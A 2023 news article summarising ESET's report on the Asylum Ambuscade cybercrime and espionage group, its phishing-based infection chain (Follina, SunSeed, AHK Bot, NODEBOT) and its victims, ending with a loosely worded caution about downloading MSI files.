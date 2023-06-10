The menacing group of cybercriminals known as Asylum Ambuscade has been observed engaging in cyber crime and cyber espionage operations since at least 2020.

Asylum Ambuscade, who they are and what their goals are

“It is a crimeware group that targets banking customers and cryptocurrency traders in different regions including North America and Europe“, has declared ESET in an analysis published on Thursday. “Asylum Ambuscade also conducts espionage against government entities in Europe and Central Asia“.

The Asylum Ambuscade group was documented first reported by Proofpoint in March 2022 as an allegedly state-sponsored phishing campaign targeting European government entities in an effort to obtain intelligence about the movement of refugees and supplies in the region.

The goal of these gentlemen, according to the Slovak IT security company, is to steal confidential information and email access credentials from the official government email portals.

The attacks begin with a spear-phishing email carrying a malicious Excel spreadsheet attachment that, when opened, exploits VBA code or the Follina vulnerability (CVE-2022-30190) to download an MSI package from a remote server.

The installer, in turn, distributes a downloader written in Lua called SunSeed (or its Visual Basic script equivalent) which, in turn, fetches an AutoHotkey-based malware known as AHK Bot from a remote server.

What is notable about Asylum Ambuscade is its cyber crime spree that has affected over 4,500 victims worldwide since January 2022, with most of them located in North America, Asia, Africa, Europe and South America.

“The selection of targets is very broad and mainly includes individuals, cryptocurrency traders and small and medium-sized businesses in different sectors“, said ESET researcher Matthieu Faou.

While one aspect of the attacks is designed to steal cryptocurrencies, targeting SMBs is likely an attempt to monetize access by selling it to other cybercriminal groups for illicit profits.

The chain of compromise follows a similar pattern, except for the initial intrusion vector, which involves the use of a spoofed Google ad or Traffic Direction System (TDS) to direct potential victims to a fake website that distributes a JavaScript file containing malware.

The attacks also made use of a Node.js version of AHK Bot called NODEBOT, which is used to download plugins to capture screenshots, steal passwords, gather system information, and install additional trojans and stealers.

Given that the attack chains are nearly identical between cybercrime and espionage efforts, it is suspected that “Asylum Ambuscade is a cybercrime group that does some cyberespionage as a sideline”.

The overlaps also extend to another activity group called Screentimes, which aims to target companies in the US and Germany with customized malware designed to steal confidential information. Proofpoint is also tracking the cybercriminal (or possibly group) known by the name TA866.

“It is quite unusual for a group of cyber criminals to conduct dedicated cyber espionage operations“said Faou, making it a rather rare occurrence in the cyber threat landscape.

Conclusions

As usual it is good that you pay attention to what you download, trivially the speech is all there.

It is no coincidence that we speak of MSI files (a type of Microsoft Windows installation file) that can only be obtained by indirect means, but very often, it is bad to say, but many people just go looking for it.